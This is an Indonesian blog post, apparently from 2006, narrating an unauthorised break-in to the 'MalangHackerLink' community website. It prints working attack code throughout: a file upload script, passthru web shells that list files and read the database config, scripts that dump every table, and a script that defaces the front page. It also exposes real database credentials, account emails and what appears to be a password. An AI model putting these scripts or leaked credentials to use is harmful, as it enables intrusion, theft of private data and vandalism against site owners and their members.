LaGiPusHinGWitH ---- IT

Navigation

Home |

Categories

• Computer Hacking
• Computer Diary
• Computer DataBase
• Computer Propaganda
• Computer Prophile
• Computer Security
• Computer Unix

Monthly Archives

• September 2010
• October 2009
• December 2008
• November 2008
• October 2008
• September 2008
• July 2008
• May 2008
• March 2008
• December 2007
• October 2007
• September 2007
• August 2007

Most recent entries

• Create Oracle Tablespace on SAP with BRTools
• Audit on Oracle Database
• Membuat Oracle Data Guard
• Cerita Tentang Kamu
• Membuat ulang/re-create controlfile di oracle
• Membuat RMAN dengan crontab
• Saat kau hadir kembali
• Memindahkan controlfile dan redologfile pada Oracle
• Oracle Dataguard on Standart Edition
• Adakah aku dihatimu
• Instalasi 10g di HP-UX Itanium
• Instalasi OpenOffice di Slackware 12
• Syncronize archive log
• Merubah ukuran archived Log
• Alter Block Size for tablespace

Syndicate

• RSS 2.0
• Atom

Site Credits

Powered by:
ExpressionEngine

Design by:
BlogMoxie

Author: roninmorgue
Date: May, 31th 2006
Location: Indonesia, Jakarta
Web: http://www.forum.mercubuana-it.org/

------------------------------------------------------------

Saya selama ini selalu posting tentang vulnerabilities pada sebuah software.
Mungkin anda semua bosan. Jadi untuk kali ini saya coba posting bagaimana saya
melakukan hacking terhadap komunitas MalangHackerLink

1
Setelah melakukan tahapan reconnaisance dan scanning, saya ketahui server
MalangHackerLink masih memiliki kelemahan -> Apache/1.x.xx, passthru is enabled/on.
catt : alamat ip server saya rahasiakan.
2
Setelah memperoleh akses untuk mengupload file keserver <ngga perlu diceritain
yah.. wink>,saya ketahui root path dari server tersebut adalah /home/[folder_target]/public_html…
ini ditemukan dari file konfigurasi nameserver -->
================potong===========================
malanghack.net: sincan2 /home/sincan2/public_html
================potong===========================
3
Kemudian saya mengupload file yang sangat penting, script untuk mengupload
file ke root_path target pada folder /upload, supaya semua bisa dilakukan melalui
url (lebih mudah..) -->

upload.php
============================potong======================
<?php
}
else
{
$path=$target_folder;
$simpan="$path".$HTTP_POST_FILES['filenya']['name'];
if($HTTP_POST_FILES['filenya']['size'] <=0)
{
print"File anda gagal di upload...!";
}
else
{
@copy($HTTP_POST_FILES['filenya']['tmp_name'],$simpan);
print"file anda berhasil di upload...!";
}
}
?>

Langkah berikutnya adalah saya mengupload script cmd.php ke root_path dari
MalangHackerLink

cmd.php
<?
echo "".passthru(' ls -la /home/sincan2/public_html ; id ')."";
?>

script ini berfungsi untuk melakukan command shell pada server yang vulnerable walaupun
saya hanya memiliki level akses ‘nobody’ jauh dari harapan untuk mendapatkan level akses ‘root’,
tapi ini sudah cukup untuk kita terus meng-exploitasi-nya wink

total ***
drwxr-x--- 37 sincan2 nobody 2048 Apr 13 2005 .
drwx--x--x 14 sincan2 sincan2 1024 Dec 1 09:22 ..
drwxrwxrwx 14 sincan2 sincan2 360 Apr 1 2005 upload
-rw-r--r-- 1 sincan2 sincan2 360 Apr 2 2005 article.php
-rw-r--r-- 1 sincan2 sincan2 630 Apr 13 2005 article_read.php
-rw-r--r-- 1 sincan2 sincan2 360 Apr 2 2005 connect.php
-rw-r--r-- 1 sincan2 sincan2 626 Apr 13 2005 download_read.php
-rw-r--r-- 1 sincan2 sincan2 626 Apr 13 2005 deface_read.php
-rw-r--r-- 1 sincan2 sincan2 626 Apr 13 2005 index.php
=========================potong====================

4
Gotcha..saya melihat ada file yang menarik..., tepat file connect.php (saya berasumsi
disitulah letak konfigurasi dari database MalangHackerLink. Jadi saya kembali mengupload
script cmd1.php menggunakan file upload.php

cmd1.php
<?
echo "".passthru(' cat /home/sincan2/public_html/connect.php ')."";
?>

dan hmmm...terbukalah konfigurasi dari koneksi databasenya… smile
connect.php
<?
$database="sincan2_hack";
$sqlhost="localhost";
$sqluser="sincan2_abde";
$sqlpass="abdecakep12345";

mysql_connect($sqlhost,$sqluser,$sqlpass) OR DIE("1");
mysql_select_db($database) OR DIE("1");
?>

5
Sampai sini, saya coba untuk meng-exploitasi databasenya...Upload script
config1.php,config2.php hasil pemikiran panjang saya smile
============================potong=====================
}
else
{
mysql_connect($server,"$user", “$password");
$hasil=mysql_db_query($db, “show tables from $db");
$isi=mysql_num_rows($hasil);
while($isi1=mysql_fetch_row($hasil))
{
for($jml=0;$jml<$isi;$jml++)
{
$isi2.="$isi1[$jml] “;
}
}
echo “Lihat field Table pada $db”;
echo “
<form name="form1" method="post" action="config2.php?proses=1">
<table width="325" border="1" cellspacing="1" cellpadding="0">
<tr >
<td width="150">Masukkan table</td>
<td width="4">:</td>
<td width="170">
<input name="table" type="text" id="table">
<input type="hidden" name="db" value="$db">
<input type="hidden" name="server" value="$server">
<input type="hidden" name="user" value="$user">
<input type="hidden" name="password" value="$password"></td>
</tr>
<tr>
<td></td>
<td></td>
<td><input name="submit" type="submit" id="submit" value="Attack"></td>
</tr>
</table>
</form> “;
echo “Nama-nama table database $db”;
echo “<table width="700" border="1" cellspacing="1" cellpadding="0" >”;
echo “<tr bgcolor="#000000"><td>$isi2</td></tr></table>";
echo “
<a href=config1.php>kembali</a>”;
}
?>
============================potong=====================

config2.php
<?php
switch($proses)
{
case'1':
{
mysql_connect("$server","$user", "$password");
$parameter=mysql_db_query($db, "show fields from $table");
$isi1=mysql_num_rows($parameter);
while($isi2=mysql_fetch_row($parameter))
{
for($jml=0;$jml<$isi1;$jml++)
{
$isi3.="$isi2[$jml] ";
}
}
echo "field-field table $table

";
echo "<table width="700" border="1" cellspacing="1"
cellpadding="0" >";
echo "<tr ><td>$isi3</td></tr></table>";

$hasil=mysql_db_query($db, "select * from $table");
$isi=mysql_num_rows($parameter);
while($isi1=mysql_fetch_row($hasil))
{
for($jml=0;$jml<$isi;$jml++)
{
$isi2.="$isi1[$jml] "."|";
}
}
echo "

isi table $table

";
echo "<table width="700" border="1" cellspacing="1"
cellpadding="0" >";
echo "<tr bgcolor="#000000"><td>$isi2</td></tr></table>";
============================potong=====================

6
smile dapat… good job, ini dia isi dari databasenya...data-datanya :
* Nama-nama table database sincan2_hack -->
admin article crew deface depan download links

** field-field table admin -->
no int(5) PRI auto_increment user varchar(50) pass varchar(100)
md5pass varchar(255) email varchar(255) last varchar(255) nick varchar(50)
email_id varchar(100)

*** isi table admin -->
1 |sincan2 |- |- |sincan2@malanghack.net | |Sincan2 |haldi1304 |

** field-field table crew -->
no int(11) PRI nama varchar(255) email varchar(255) url varchar(255)

*** isi table crew -->
1 |J1nX |abde@j1nx.net |http://j1nx.net/ |

** field-field table depan
no int(5) depan longtext

*** isi table depan
1 |
Welcome to #malanghack
Rendrian Rizaldi Putra Atmono 7 Oktober 2005 jam 11 Malam
(HADI + ERNA)
--------------------------------------------------------
Selamat Tinggal 2005 masa kelam di mana suka dan duka selalu menyelimuti kita
Dan selamat Datang 2006 semoga Tuhan senantiasa bersama kita.
--------------------------------------------------------
Selamat Hari Natal Untuk semuanya yang merayakan.
--------------------------------------------------------

7
Sebelumnya perhatian saya pada tabel 'admin',tapi ternyata loginnya tidak menggunakan
database :( ,jadi saya mengalihkan perhatian pada tabel 'depan', karena menurut saya
ucapan pesan sang Master ada pada tabel ini

8
What Next… ok dengan status drwxrwxrwx pada folder /upload, maka kita bisa menulis
sebuah file
expl.php
<?php

print "
";
print " =======================================
";
print " MalangHackerLink Local Root Exploit
";
print " =======================================
";

print "
";
print "[+] Now attacking ";
print "
";
print "[+] Building page extension..";

$exploit_file = fopen("Explhackerlink.php", "a+");

print "[DONE]
";
print "[+] Update Database ..";

$the_exploit = "<?

include("../connect.php");

mysql_connect($sqlhost, $sqluser, $sqlpass);

$hasil = mysql_db_query($database, "UPDATE depan SET depan =
'Hack By Anstellwinkel' WHERE no = 1");

?>”;

print “[DONE]
“;

print “[+] Sending bugs writable [a+]..
“;

print “[+] Create Explhackerlink.php...”;
if (flock($exploit_file, LOCK_EX)) {
fputs($exploit_file, $the_exploit);
flock($exploit_file, LOCK_UN);
print “[OK] “;

print “ “;

print “[+] Sending bugs..[DONE]!!
“;
print “[*] Exploited Successed!
“;
print “ “;
print “------------------------------------------------------------------
“;
print “ + Information:[anstellwinkel@yahoo.com.au]-[www.forum.mercubuana-it.org] +
“;
print “------------------------------------------------------------------
“;
}else {
print “
“;
print “[!] [FAILED] Permission is not writable!!
“;
print “
“;
print “------------------------------------------------------------------
“;
print “ + Information:[anstellwinkel@yahoo.com.au]-[www.forum.mercubuana-it.org] +
“;
print “------------------------------------------------------------------
“;
}

fclose($exploit_file);

print “<a href=Explhackerlink.php>MalangHackerLink Exploited”;

?>

9
Selesai..., OK sebenarnya kita bisa lebih extrem dengan men-drop databasenya but…
remember about ethical hacker -> not for criminal, not destruction… hanya memberitahu
saja pada sang admin smile

catt : semua script saya itu pernah diposting pada forum ini, atau DL di -->>
http://www.geocities.com/anstellwinkel/ ... equest.zip
------------------------------------------------------------------

Shoutz:
~~~~~~~

~ forum|staff (roninmorgue, darkstar, admin, qnoyyy, gaga, kalion, WaferStick, newbie, cloud)
~ mercubuana-it@yahoogroups.com ,

------------------------------------------------------------------

Contact:
~~~~~~~~

roninmorgue || forum|staff
Homepage: http://www.forum.mercubuana-it.org/
email: roninmorgue[at]yahoo[dot]co[dot]id

----------------------------------- [ EOF ] ----------------------